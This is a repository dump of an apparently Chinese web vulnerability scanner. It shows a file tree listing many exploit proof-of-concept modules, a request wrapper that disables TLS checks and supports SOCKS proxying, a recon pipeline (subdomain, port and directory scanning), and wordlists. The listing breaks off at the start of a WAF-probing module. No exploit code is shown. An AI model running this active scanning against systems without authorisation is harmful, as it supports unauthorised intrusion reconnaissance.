├── AWVS_Check ├── AWVS.py └── __pycache__ │ ├── AWVS.cpython-37.pyc │ └── AWVS.cpython-38.pyc ├── Information_Scan ├── Requests.py ├── __pycache__ │ ├── Requests.cpython-37.pyc │ ├── Requests.cpython-38.pyc │ ├── common.cpython-37.pyc │ ├── common.cpython-38.pyc │ ├── iscdn.cpython-37.pyc │ ├── random_header.cpython-37.pyc │ ├── random_header.cpython-38.pyc │ ├── url.cpython-37.pyc │ ├── url.cpython-38.pyc │ ├── verify.cpython-37.pyc │ ├── verify.cpython-38.pyc │ ├── waf.cpython-37.pyc │ ├── waf.cpython-38.pyc │ ├── web_info.cpython-37.pyc │ └── web_info.cpython-38.pyc ├── common.py ├── data │ ├── GeoLite2-ASN.mmdb │ ├── GeoLite2-City.mmdb │ ├── apps.json │ ├── apps.txt │ └── path │ │ ├── cdn_servers.txt │ │ ├── dir.txt │ │ ├── next_sub_full.txt │ │ ├── user-agents.txt │ │ └── wydomain.csv ├── plugins │ ├── ActiveReconnaissance │ │ ├── __pycache__ │ │ │ ├── active.cpython-37.pyc │ │ │ ├── check_waf.cpython-37.pyc │ │ │ ├── check_waf.cpython-38.pyc │ │ │ ├── crawl.cpython-37.pyc │ │ │ ├── osdetect.cpython-37.pyc │ │ │ └── osdetect.cpython-38.pyc │ │ ├── check_waf.py │ │ ├── osdetect.py │ │ └── robots.py │ ├── InformationGathering │ │ ├── __pycache__ │ │ │ ├── geoip.cpython-37.pyc │ │ │ ├── geoip.cpython-38.pyc │ │ │ └── js_leaks.cpython-37.pyc │ │ └── geoip.py │ ├── PassiveReconnaissance │ │ ├── __pycache__ │ │ │ ├── ip_history.cpython-37.pyc │ │ │ ├── reverse_domain.cpython-37.pyc │ │ │ ├── reverse_domain.cpython-38.pyc │ │ │ ├── sub_domain.cpython-37.pyc │ │ │ ├── sub_domain.cpython-38.pyc │ │ │ ├── virustotal.cpython-37.pyc │ │ │ ├── wappalyzer.cpython-37.pyc │ │ │ └── wappalyzer.cpython-38.pyc │ │ ├── ip_history.py │ │ ├── reverse_domain.py │ │ ├── sub_domain.py │ │ └── wappalyzer.py │ └── Scanning │ │ ├── __pycache__ │ │ ├── async_scan.cpython-37.pyc │ │ ├── async_scan.cpython-38.pyc │ │ ├── check_target.cpython-37.pyc │ │ ├── check_target.cpython-38.pyc │ │ ├── port_scan.cpython-37.pyc │ │ └── port_scan.cpython-38.pyc │ │ ├── async_scan.py │ │ ├── 
check_target.py │ │ └── port_scan.py ├── random_header.py ├── url.py ├── verify.py ├── waf.py └── web_info.py ├── JR.py ├── POC_Scan ├── __pycache__ │ ├── main.cpython-37.pyc │ ├── main.cpython-38.pyc │ ├── pocdb.cpython-37.pyc │ └── pocdb.cpython-38.pyc ├── cms │ ├── __init__.py │ ├── __pycache__ │ │ ├── __init__.cpython-37.pyc │ │ ├── __init__.cpython-38.pyc │ │ ├── cmsmain.cpython-37.pyc │ │ └── cmsmain.cpython-38.pyc │ ├── cmsmain.py │ ├── dedecms │ │ ├── __init__.py │ │ ├── __pycache__ │ │ │ ├── __init__.cpython-37.pyc │ │ │ ├── __init__.cpython-38.pyc │ │ │ ├── dedecms_download_redirect.cpython-37.pyc │ │ │ ├── dedecms_download_redirect.cpython-38.pyc │ │ │ ├── dedecms_error_trace_disclosure.cpython-37.pyc │ │ │ ├── dedecms_error_trace_disclosure.cpython-38.pyc │ │ │ ├── dedecms_recommend_sqli.cpython-37.pyc │ │ │ ├── dedecms_recommend_sqli.cpython-38.pyc │ │ │ ├── dedecms_search_typeArr_sqli.cpython-37.pyc │ │ │ ├── dedecms_search_typeArr_sqli.cpython-38.pyc │ │ │ ├── dedecms_version.cpython-37.pyc │ │ │ └── dedecms_version.cpython-38.pyc │ │ ├── dedecms_download_redirect.py │ │ ├── dedecms_error_trace_disclosure.py │ │ ├── dedecms_recommend_sqli.py │ │ ├── dedecms_search_typeArr_sqli.py │ │ └── dedecms_version.py │ ├── discuz │ │ ├── __init__.py │ │ ├── __pycache__ │ │ │ ├── __init__.cpython-37.pyc │ │ │ ├── __init__.cpython-38.pyc │ │ │ ├── discuz_focus_flashxss.cpython-37.pyc │ │ │ ├── discuz_focus_flashxss.cpython-38.pyc │ │ │ ├── discuz_forum_message_ssrf.cpython-37.pyc │ │ │ ├── discuz_forum_message_ssrf.cpython-38.pyc │ │ │ ├── discuz_plugin_ques_sqli.cpython-37.pyc │ │ │ ├── discuz_plugin_ques_sqli.cpython-38.pyc │ │ │ ├── discuz_x25_path_disclosure.cpython-37.pyc │ │ │ └── discuz_x25_path_disclosure.cpython-38.pyc │ │ ├── discuz_focus_flashxss.py │ │ ├── discuz_forum_message_ssrf.py │ │ ├── discuz_plugin_ques_sqli.py │ │ └── discuz_x25_path_disclosure.py │ ├── joomla │ │ ├── __init__.py │ │ ├── __pycache__ │ │ │ ├── __init__.cpython-37.pyc │ │ │ ├── 
__init__.cpython-38.pyc │ │ │ ├── joomla_com_docman_lfi.cpython-37.pyc │ │ │ ├── joomla_com_docman_lfi.cpython-38.pyc │ │ │ ├── joomla_index_list_sqli.cpython-37.pyc │ │ │ └── joomla_index_list_sqli.cpython-38.pyc │ │ ├── joomla_com_docman_lfi.py │ │ └── joomla_index_list_sqli.py │ ├── phpcms │ │ ├── __init__.py │ │ ├── __pycache__ │ │ │ ├── __init__.cpython-37.pyc │ │ │ ├── __init__.cpython-38.pyc │ │ │ ├── phpcms_authkey_disclosure.cpython-37.pyc │ │ │ ├── phpcms_authkey_disclosure.cpython-38.pyc │ │ │ ├── phpcms_digg_add_sqli.cpython-37.pyc │ │ │ ├── phpcms_digg_add_sqli.cpython-38.pyc │ │ │ ├── phpcms_flash_upload_sqli.cpython-37.pyc │ │ │ ├── phpcms_flash_upload_sqli.cpython-38.pyc │ │ │ ├── phpcms_product_code_exec.cpython-37.pyc │ │ │ ├── phpcms_product_code_exec.cpython-38.pyc │ │ │ ├── phpcms_v961_fileread.cpython-37.pyc │ │ │ ├── phpcms_v961_fileread.cpython-38.pyc │ │ │ ├── phpcms_v96_sqli.cpython-37.pyc │ │ │ ├── phpcms_v96_sqli.cpython-38.pyc │ │ │ ├── phpcms_v9_flash_xss.cpython-37.pyc │ │ │ └── phpcms_v9_flash_xss.cpython-38.pyc │ │ ├── phpcms_authkey_disclosure.py │ │ ├── phpcms_digg_add_sqli.py │ │ ├── phpcms_flash_upload_sqli.py │ │ ├── phpcms_product_code_exec.py │ │ ├── phpcms_v961_fileread.py │ │ ├── phpcms_v96_sqli.py │ │ └── phpcms_v9_flash_xss.py │ ├── phpmyadmin │ │ ├── __init__.py │ │ ├── __pycache__ │ │ │ ├── __init__.cpython-37.pyc │ │ │ ├── __init__.cpython-38.pyc │ │ │ ├── phpmyadmin_setup_lfi.cpython-37.pyc │ │ │ └── phpmyadmin_setup_lfi.cpython-38.pyc │ │ └── phpmyadmin_setup_lfi.py │ ├── phpok │ │ ├── __init__.py │ │ ├── __pycache__ │ │ │ ├── __init__.cpython-37.pyc │ │ │ ├── __init__.cpython-38.pyc │ │ │ ├── phpok_api_param_sqli.cpython-37.pyc │ │ │ ├── phpok_api_param_sqli.cpython-38.pyc │ │ │ ├── phpok_remote_image_getshell.cpython-37.pyc │ │ │ ├── phpok_remote_image_getshell.cpython-38.pyc │ │ │ ├── phpok_res_action_control_filedownload.cpython-37.pyc │ │ │ └── phpok_res_action_control_filedownload.cpython-38.pyc │ │ ├── 
phpok_api_param_sqli.py │ │ ├── phpok_remote_image_getshell.py │ │ └── phpok_res_action_control_filedownload.py │ ├── phpstudy │ │ ├── __init__.py │ │ ├── __pycache__ │ │ │ ├── __init__.cpython-37.pyc │ │ │ ├── __init__.cpython-38.pyc │ │ │ ├── phpstudy_backdoor.cpython-37.pyc │ │ │ ├── phpstudy_backdoor.cpython-38.pyc │ │ │ ├── phpstudy_phpmyadmin_defaultpwd.cpython-37.pyc │ │ │ └── phpstudy_probe.cpython-37.pyc │ │ └── phpstudy_backdoor.py │ ├── sangfor │ │ ├── __pycache__ │ │ │ └── sanfor_edr.cpython-38.pyc │ │ └── sanfor_edr.py │ ├── tongda_oa │ │ ├── __pycache__ │ │ │ └── tongdaRCE.cpython-38.pyc │ │ └── tongdaRCE.py │ ├── weaver_oa │ │ ├── __init__.py │ │ ├── __pycache__ │ │ │ ├── __init__.cpython-37.pyc │ │ │ ├── __init__.cpython-38.pyc │ │ │ ├── weaver_oa_db_disclosure.cpython-37.pyc │ │ │ ├── weaver_oa_db_disclosure.cpython-38.pyc │ │ │ ├── weaver_oa_download_sqli.cpython-37.pyc │ │ │ ├── weaver_oa_download_sqli.cpython-38.pyc │ │ │ ├── weaver_oa_filedownload.cpython-37.pyc │ │ │ └── weaver_oa_filedownload.cpython-38.pyc │ │ ├── weaver_oa_db_disclosure.py │ │ ├── weaver_oa_download_sqli.py │ │ └── weaver_oa_filedownload.py │ └── wordpress │ │ ├── __init__.py │ │ ├── __pycache__ │ │ ├── __init__.cpython-37.pyc │ │ ├── __init__.cpython-38.pyc │ │ ├── wordpress_admin_ajax_filedownload.cpython-37.pyc │ │ ├── wordpress_admin_ajax_filedownload.cpython-38.pyc │ │ ├── wordpress_display_widgets_backdoor.cpython-37.pyc │ │ ├── wordpress_display_widgets_backdoor.cpython-38.pyc │ │ ├── wordpress_plugin_ShortCode_lfi.cpython-37.pyc │ │ ├── wordpress_plugin_ShortCode_lfi.cpython-38.pyc │ │ ├── wordpress_plugin_azonpop_sqli.cpython-37.pyc │ │ ├── wordpress_plugin_azonpop_sqli.cpython-38.pyc │ │ ├── wordpress_plugin_mailpress_rce.cpython-37.pyc │ │ ├── wordpress_plugin_mailpress_rce.cpython-38.pyc │ │ ├── wordpress_restapi_sqli.cpython-37.pyc │ │ ├── wordpress_restapi_sqli.cpython-38.pyc │ │ ├── wordpress_url_redirect.cpython-37.pyc │ │ ├── 
wordpress_url_redirect.cpython-38.pyc │ │ ├── wordpress_woocommerce_code_exec.cpython-37.pyc │ │ └── wordpress_woocommerce_code_exec.cpython-38.pyc │ │ ├── wordpress_admin_ajax_filedownload.py │ │ ├── wordpress_display_widgets_backdoor.py │ │ ├── wordpress_plugin_ShortCode_lfi.py │ │ ├── wordpress_plugin_azonpop_sqli.py │ │ ├── wordpress_plugin_mailpress_rce.py │ │ ├── wordpress_restapi_sqli.py │ │ ├── wordpress_url_redirect.py │ │ └── wordpress_woocommerce_code_exec.py ├── information │ ├── __init__.py │ ├── __pycache__ │ │ ├── __init__.cpython-37.pyc │ │ ├── __init__.cpython-38.pyc │ │ ├── apache_server_status_disclosure.cpython-37.pyc │ │ ├── apache_server_status_disclosure.cpython-38.pyc │ │ ├── crossdomain_find.cpython-37.pyc │ │ ├── crossdomain_find.cpython-38.pyc │ │ ├── git_check.cpython-37.pyc │ │ ├── git_check.cpython-38.pyc │ │ ├── informationmain.cpython-37.pyc │ │ ├── informationmain.cpython-38.pyc │ │ ├── jetbrains_ide_workspace_disclosure.cpython-37.pyc │ │ ├── jetbrains_ide_workspace_disclosure.cpython-38.pyc │ │ ├── jsp_conf_find.cpython-37.pyc │ │ ├── jsp_conf_find.cpython-38.pyc │ │ ├── options_method.cpython-37.pyc │ │ ├── options_method.cpython-38.pyc │ │ ├── robots_find.cpython-37.pyc │ │ ├── robots_find.cpython-38.pyc │ │ ├── springboot_api.cpython-37.pyc │ │ ├── springboot_api.cpython-38.pyc │ │ ├── svn_check.cpython-37.pyc │ │ └── svn_check.cpython-38.pyc │ ├── apache_server_status_disclosure.py │ ├── crossdomain_find.py │ ├── git_check.py │ ├── informationmain.py │ ├── jetbrains_ide_workspace_disclosure.py │ ├── jsp_conf_find.py │ ├── options_method.py │ ├── robots_find.py │ ├── springboot_api.py │ └── svn_check.py ├── main.py ├── pocdb.py └── system │ ├── __init__.py │ ├── __pycache__ │ ├── __init__.cpython-37.pyc │ ├── __init__.cpython-38.pyc │ ├── systemmain.cpython-37.pyc │ └── systemmain.cpython-38.pyc │ ├── iis │ ├── __init__.py │ ├── __pycache__ │ │ ├── __init__.cpython-37.pyc │ │ ├── __init__.cpython-38.pyc │ │ ├── 
iis_webdav_rce.cpython-37.pyc │ │ └── iis_webdav_rce.cpython-38.pyc │ └── iis_webdav_rce.py │ ├── nginx │ ├── __init__.py │ ├── __pycache__ │ │ ├── __init__.cpython-37.pyc │ │ ├── __init__.cpython-38.pyc │ │ ├── multi_fastcgi_code_exec.cpython-37.pyc │ │ └── multi_fastcgi_code_exec.cpython-38.pyc │ └── multi_fastcgi_code_exec.py │ ├── php │ ├── __init__.py │ ├── __pycache__ │ │ ├── __init__.cpython-37.pyc │ │ ├── __init__.cpython-38.pyc │ │ ├── php_expose_disclosure.cpython-37.pyc │ │ ├── php_expose_disclosure.cpython-38.pyc │ │ ├── php_fastcgi_read.cpython-37.pyc │ │ └── php_fastcgi_read.cpython-38.pyc │ ├── php_expose_disclosure.py │ └── php_fastcgi_read.py │ ├── ssh │ ├── __init__.py │ ├── __pycache__ │ │ ├── __init__.cpython-37.pyc │ │ ├── __init__.cpython-38.pyc │ │ ├── libssh_bypass_auth.cpython-37.pyc │ │ └── libssh_bypass_auth.cpython-38.pyc │ └── libssh_bypass_auth.py │ ├── systemmain.py │ ├── tomcat │ ├── __init__.py │ ├── __pycache__ │ │ ├── __init__.cpython-37.pyc │ │ ├── __init__.cpython-38.pyc │ │ ├── tomcat_Ajp_lfi.cpython-37.pyc │ │ ├── tomcat_Ajp_lfi.cpython-38.pyc │ │ ├── tomcat_put_exec.cpython-37.pyc │ │ ├── tomcat_put_exec.cpython-38.pyc │ │ └── tomcat_weak_pass.cpython-37.pyc │ ├── tomcat_Ajp_lfi.py │ └── tomcat_put_exec.py │ ├── weblogic │ ├── __init__.py │ ├── __pycache__ │ │ ├── __init__.cpython-37.pyc │ │ ├── __init__.cpython-38.pyc │ │ ├── weblogic_interface_disclosure.cpython-37.pyc │ │ ├── weblogic_interface_disclosure.cpython-38.pyc │ │ ├── weblogic_ssrf.cpython-37.pyc │ │ ├── weblogic_ssrf.cpython-38.pyc │ │ ├── weblogic_weak_pass.cpython-37.pyc │ │ ├── weblogic_ws_utc_xxe.cpython-37.pyc │ │ ├── weblogic_ws_utc_xxe.cpython-38.pyc │ │ ├── weblogic_xmldecoder_exec.cpython-37.pyc │ │ └── weblogic_xmldecoder_exec.cpython-38.pyc │ ├── weblogic_interface_disclosure.py │ ├── weblogic_ssrf.py │ ├── weblogic_ws_utc_xxe.py │ └── weblogic_xmldecoder_exec.py │ └── windows │ ├── 0708detector.exe │ ├── RDP_CodeExecution.py │ ├── __pycache__ │ ├── 
RDP_CodeExecution.cpython-37.pyc │ ├── RDP_CodeExecution.cpython-38.pyc │ ├── smb_code_execution.cpython-37.pyc │ └── smb_code_execution.cpython-38.pyc │ └── smb_code_execution.py ├── README.md ├── __pycache__ ├── report.cpython-37.pyc └── report.cpython-38.pyc ├── images ├── dbs.png ├── image ├── port.png ├── url.png ├── vuln.png ├── 启动.png ├── 子域名.png └── 整站.png ├── lib ├── __pycache__ │ ├── active.cpython-37.pyc │ ├── active.cpython-38.pyc │ ├── bcolors.cpython-37.pyc │ ├── bcolors.cpython-38.pyc │ ├── cli_output.cpython-37.pyc │ ├── cli_output.cpython-38.pyc │ ├── enter.cpython-37.pyc │ ├── enter.cpython-38.pyc │ ├── setting.cpython-37.pyc │ ├── setting.cpython-38.pyc │ ├── sqldb.cpython-37.pyc │ └── sqldb.cpython-38.pyc ├── active.py ├── bcolors.py ├── cli_output.py ├── enter.py ├── setting.py └── sqldb.py ├── report.py ├── report ├── bootstrap.min.css ├── en.js ├── fonts │ ├── element-icons.ttf │ └── element-icons.woff ├── index.css ├── index.js ├── report.htm └── vue.min.js ├── requirements.txt ├── result.db └── scan_20201012192034.html /AWVS_Check/__pycache__/AWVS.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/AWVS_Check/__pycache__/AWVS.cpython-37.pyc -------------------------------------------------------------------------------- /AWVS_Check/__pycache__/AWVS.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/AWVS_Check/__pycache__/AWVS.cpython-38.pyc -------------------------------------------------------------------------------- /Information_Scan/Requests.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib3 3 | import hashlib 4 | import random 5 | import re 6 | import ssl 7 | import socks 8 | import socket 9 
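from Information_Scan.random_header import get_ua
from lib.setting import TIMEOUT, COOKIE, SOCKS5

# Only a scheme at the very start of the string counts as "already has one".
_SCHEME_RE = re.compile(r'^https?://', re.IGNORECASE)


def verify(url):
    """Return *url* with an explicit scheme, defaulting to ``http://``.

    The previous check, ``re.search('http:|https:', url)``, matched anywhere in
    the string: ``example.com/?next=http://x`` was left without a scheme and an
    uppercase ``HTTPS://host`` was double-prefixed.  Only a leading
    ``http://`` / ``https://`` (case-insensitive) is accepted as a scheme now.

    Args:
        url: host, host:port, or full URL as typed by the operator.

    Returns:
        *url* unchanged when it already starts with http(s)://, otherwise
        ``'http://' + url``.
    """
    if _SCHEME_RE.match(url):
        return url
    return 'http://' + url


class Requests:
    """Thin ``requests.Session`` wrapper shared by the scanner plugins.

    Every request method returns the ``requests.Response`` on success and
    ``None`` when the request failed; callers must check for ``None``.

    Deliberate, scanner-specific security trade-offs (do not "fix" blindly):
      * TLS certificate verification is OFF (``verify=False``) on every
        request because scan targets routinely present self-signed or expired
        certificates.  Responses therefore carry no authenticity guarantee --
        never reuse this session for anything that sends real credentials.
      * The Cookie header is a throw-away ``SESSION=<md5>`` value (or the
        configured COOKIE) so requests look like a returning browser; it is
        camouflage, not a credential.
      * With SOCKS5 configured, the *process-wide* ``socket.socket`` is
        replaced by PySocks' socket.  That is a global side effect other
        modules may rely on, so it is kept; but because urllib3 resolves
        hostnames with ``socket.getaddrinfo()`` before connecting, the
        monkey-patch alone still sends DNS queries from the local resolver.
        The session is therefore also given a ``socks5h://`` proxy, which
        hands the hostname to the proxy for resolution.
    """

    def __init__(self):
        # verify=False would otherwise emit an InsecureRequestWarning per
        # request.  One call suffices: the default category (HTTPWarning)
        # covers InsecureRequestWarning, and requests.packages.urllib3 is the
        # same module as urllib3.
        urllib3.disable_warnings()

        self.timeout = TIMEOUT            # per-request timeout (lib.setting)
        self.session = requests.Session()  # keep-alive + cookie jar across calls
        self.headers = get_ua()           # randomised User-Agent header dict

        if COOKIE == 'random':
            # md5 of 8 random digits -- looks like a session id, means nothing.
            # `random` (not `secrets`) is fine: this is not a secret.
            plain = ''.join(random.choice('0123456789') for _ in range(8))
            fake_session = hashlib.md5(plain.encode('utf-8')).hexdigest()
            self.headers.update({'Cookie': 'SESSION=' + fake_session})
        elif not COOKIE:
            # None / '' -> send no extra cookie (dict.update(None) used to raise).
            pass
        elif isinstance(COOKIE, str):
            # A plain "k=v; k2=v2" string is used verbatim as the Cookie header
            # (dict.update(str) used to raise ValueError on such a setting).
            self.headers.update({'Cookie': COOKIE})
        else:
            # Assumed to be a header mapping, e.g. {'Cookie': '...'}.
            self.headers.update(COOKIE)

        if SOCKS5:
            ip, port = SOCKS5
            socks.set_default_proxy(socks.SOCKS5, ip, port)
            socket.socket = socks.socksocket  # global monkey-patch (see class doc)
            # socks5h: remote DNS, so hostnames are not leaked to the local
            # resolver for requests made through this session.
            proxy = 'socks5h://{}:{}'.format(ip, port)
            self.session.proxies = {'http': proxy, 'https': proxy}

    def _send(self, method, url, **kwargs):
        """Issue one request; return the Response, or None if it failed.

        Only transport/URL errors are swallowed.  The old bare ``except:``
        also ate KeyboardInterrupt/SystemExit, so Ctrl-C could not stop a scan.
        """
        try:
            return self.session.request(method, url,
                                        timeout=self.timeout,
                                        verify=False,  # see class docstring
                                        **kwargs)
        except (requests.RequestException, OSError, ValueError):
            # OSError covers socket/PySocks ProxyError; ValueError covers
            # malformed URLs/hostnames that escape requests' own wrapping.
            return None

    def scan(self, url):
        """GET *url* without following redirects; body is streamed, not read.

        Meant for cheap liveness/header checks.  With ``stream=True`` the
        connection stays open until the caller reads ``r.content`` or calls
        ``r.close()`` -- do one or the other.
        """
        return self._send('GET', verify(url),
                          headers=self.headers,
                          stream=True,
                          allow_redirects=False)

    def get(self, url):
        """GET *url* with the wrapper's headers; redirects are NOT followed."""
        return self._send('GET', verify(url),
                          headers=self.headers,
                          allow_redirects=False)

    def post(self, url, data):
        """POST *data* (form-encoded dict / str / bytes) to *url*; no redirects."""
        return self._send('POST', verify(url),
                          data=data,
                          headers=self.headers,
                          allow_redirects=False)

    def request(self, url, method, data=None, headers=None):
        """Generic entry point used by the POC plugins.

        ``method`` is compared case-insensitively: 'get'/'GET' issues a GET
        that *follows* redirects; anything else is sent as a POST that does
        not (previously 'GET' silently became a POST).  ``headers`` is passed
        straight through, so None means the Session's own defaults, not
        ``self.headers``.
        """
        url = verify(url)
        if str(method).lower() == 'get':
            return self._send('GET', url, headers=headers, allow_redirects=True)
        return self._send('POST', url,
                          data=data,
                          headers=headers,
                          allow_redirects=False)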
-------------------------------------------------------------------------------- /Information_Scan/__pycache__/iscdn.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/iscdn.cpython-37.pyc -------------------------------------------------------------------------------- /Information_Scan/__pycache__/random_header.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/random_header.cpython-37.pyc -------------------------------------------------------------------------------- /Information_Scan/__pycache__/random_header.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/random_header.cpython-38.pyc -------------------------------------------------------------------------------- /Information_Scan/__pycache__/url.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/url.cpython-37.pyc -------------------------------------------------------------------------------- /Information_Scan/__pycache__/url.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/url.cpython-38.pyc -------------------------------------------------------------------------------- /Information_Scan/__pycache__/verify.cpython-37.pyc: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/verify.cpython-37.pyc -------------------------------------------------------------------------------- /Information_Scan/__pycache__/verify.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/verify.cpython-38.pyc -------------------------------------------------------------------------------- /Information_Scan/__pycache__/waf.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/waf.cpython-37.pyc -------------------------------------------------------------------------------- /Information_Scan/__pycache__/waf.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/waf.cpython-38.pyc -------------------------------------------------------------------------------- /Information_Scan/__pycache__/web_info.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/web_info.cpython-37.pyc -------------------------------------------------------------------------------- /Information_Scan/__pycache__/web_info.cpython-38.pyc: -------------------------------------------------------------------------------- 
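# ---- /Information_Scan/common.py ----
from Information_Scan.web_info import web_info
from lib.sqldb import Sqldb
from Information_Scan.verify import verify_https
from Information_Scan.plugins.Scanning.port_scan import ScanPort
from Information_Scan.plugins.Scanning.async_scan import DirScan
from Information_Scan.plugins.PassiveReconnaissance.sub_domain import sub_domain
from Information_Scan.url import parse_host


def web_save(webinfo, dbname):
    """Persist the collected web fingerprint *webinfo* into the database *dbname*."""
    Sqldb(dbname).get_webinfo(webinfo)


def start(target, dbname):
    """Run the information-gathering pipeline for one *target*.

    Steps, in order:
      1. verify_https()  -- resolve http/https and any redirect to the final URL
      2. web_info()      -- fingerprint the site (data, apps, title)
      3. sub_domain()    -- subdomain enumeration for the host
      4. ScanPort()      -- port scan, results written to *dbname*
      5. DirScan()       -- directory brute force, results written to *dbname*
      6. web_save()      -- store the fingerprint from step 2

    Steps 4-5 (and possibly 3) are active and noisy against the target; make
    sure the scope is authorised before running this.

    Args:
        target: host or URL as given on the command line.
        dbname: path of the SQLite result database (``result.db`` ships at the
            repository root).
    """
    url = verify_https(target)

    # apps/title are returned alongside data but not consumed here.
    data, apps, title = web_info(url)

    host = parse_host(url)
    # Called for its side effects; the return value was never used by this
    # function.  NOTE(review): presumably the plugin reports/stores its own
    # results -- confirm, otherwise subdomains are silently dropped here.
    sub_domain(host).execution()

    ScanPort(url, dbname).pool()
    DirScan(dbname, url).pool()

    web_save(data, dbname)


if __name__ == "__main__":
    # dbname is required; the original one-argument call raised TypeError.
    start('http://127.0.0.1', 'result.db')

# Binary assets that follow in the listing (not reproduced):
#   Information_Scan/data/GeoLite2-ASN.mmdb
#   Information_Scan/data/GeoLite2-City.mmdb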
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/data/GeoLite2-City.mmdb -------------------------------------------------------------------------------- /Information_Scan/data/path/cdn_servers.txt: -------------------------------------------------------------------------------- 1 | chinacache.net 2 | lxdns.com 3 | fastcdn.cn 4 | globalcdn.cn 5 | lxcdn.com 6 | aicdn.com 7 | cdn20.com 8 | fastwebcdn.com 9 | cloudcdn.net 10 | akamai-staging.net 11 | akamaized.net 12 | akamai.net 13 | cloudfront.net 14 | amazonaws.com 15 | azioncdn.net 16 | cachefly.net 17 | cdn77.net 18 | cdn77.org 19 | cdnetworks.com 20 | gccdn.net 21 | cdnify.io 22 | cdnsun.net 23 | cdnvideo.ru 24 | wscloudcdn.com 25 | edgecastcdn.net 26 | fastly.net 27 | qianxun.com 28 | hwcdn.net 29 | incapdns.net 30 | internapcdn.net 31 | jdcdn.com 32 | kxcdn.com 33 | Leaseweb 34 | lswcdn.net 35 | fpbns.net. 36 | footprint.net 37 | llnwd.net 38 | netdna-cdn.com 39 | ngenix.net 40 | ccgslb.com.cn 41 | mwcloudcdn.com 42 | speedcdns.com 43 | skyparkcdn.net 44 | ourglb0.com 45 | bitgravity.com 46 | azureedge.net 47 | anankecdn.com.br 48 | presscdn.com 49 | telefonica.com 50 | alikunlun.com 51 | ourwebcdn.com 52 | aliyuncs.com 53 | aliyun-inc.com 54 | cdn.dnsv1.com 55 | cdntip.com 56 | alicdn.com 57 | cdn20.info 58 | acadn.com 59 | fastcdn.com 60 | tcdn.qq.com 61 | dayugslb.com -------------------------------------------------------------------------------- /Information_Scan/data/path/dir.txt: -------------------------------------------------------------------------------- 1 | /home 2 | /con 3 | /su 4 | /user 5 | /static 6 | /stat 7 | /more 8 | /bhan 9 | /pub 10 | /repair 11 | /2007 12 | /2009 13 | /2004 14 | /app 15 | /temple 16 | /images 17 | /templete 18 | /site 19 | /cret 20 | /welcome.html 21 | /aaa.txt 22 | /aab.txt 23 | /aac.txt 24 | /aad.txt 25 | /aae.txt 26 | /aaf.txt 27 | /aag.txt 28 | /aah.txt 29 | /jay.txt 30 | /jaz.txt 31 | /jba.txt 32 | 
/jbb.txt 33 | /jbc.txt 34 | /jbd.txt 35 | /index.php 36 | /default.html 37 | -------------------------------------------------------------------------------- /Information_Scan/plugins/ActiveReconnaissance/__pycache__/active.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/ActiveReconnaissance/__pycache__/active.cpython-37.pyc -------------------------------------------------------------------------------- /Information_Scan/plugins/ActiveReconnaissance/__pycache__/check_waf.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/ActiveReconnaissance/__pycache__/check_waf.cpython-37.pyc -------------------------------------------------------------------------------- /Information_Scan/plugins/ActiveReconnaissance/__pycache__/check_waf.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/ActiveReconnaissance/__pycache__/check_waf.cpython-38.pyc -------------------------------------------------------------------------------- /Information_Scan/plugins/ActiveReconnaissance/__pycache__/crawl.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/ActiveReconnaissance/__pycache__/crawl.cpython-37.pyc -------------------------------------------------------------------------------- /Information_Scan/plugins/ActiveReconnaissance/__pycache__/osdetect.cpython-37.pyc: 
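# ---- /Information_Scan/plugins/ActiveReconnaissance/check_waf.py ----
import re
from Information_Scan.Requests import Requests
from Information_Scan.waf import WAF_RULE

'''
WAF detection

Send a few obviously malicious requests and look for a WAF/CDN signature in
the response headers or body.  The probes below (SQLi, path traversal, .git,
phpinfo) are intentionally noisy: they will appear in the target's logs and
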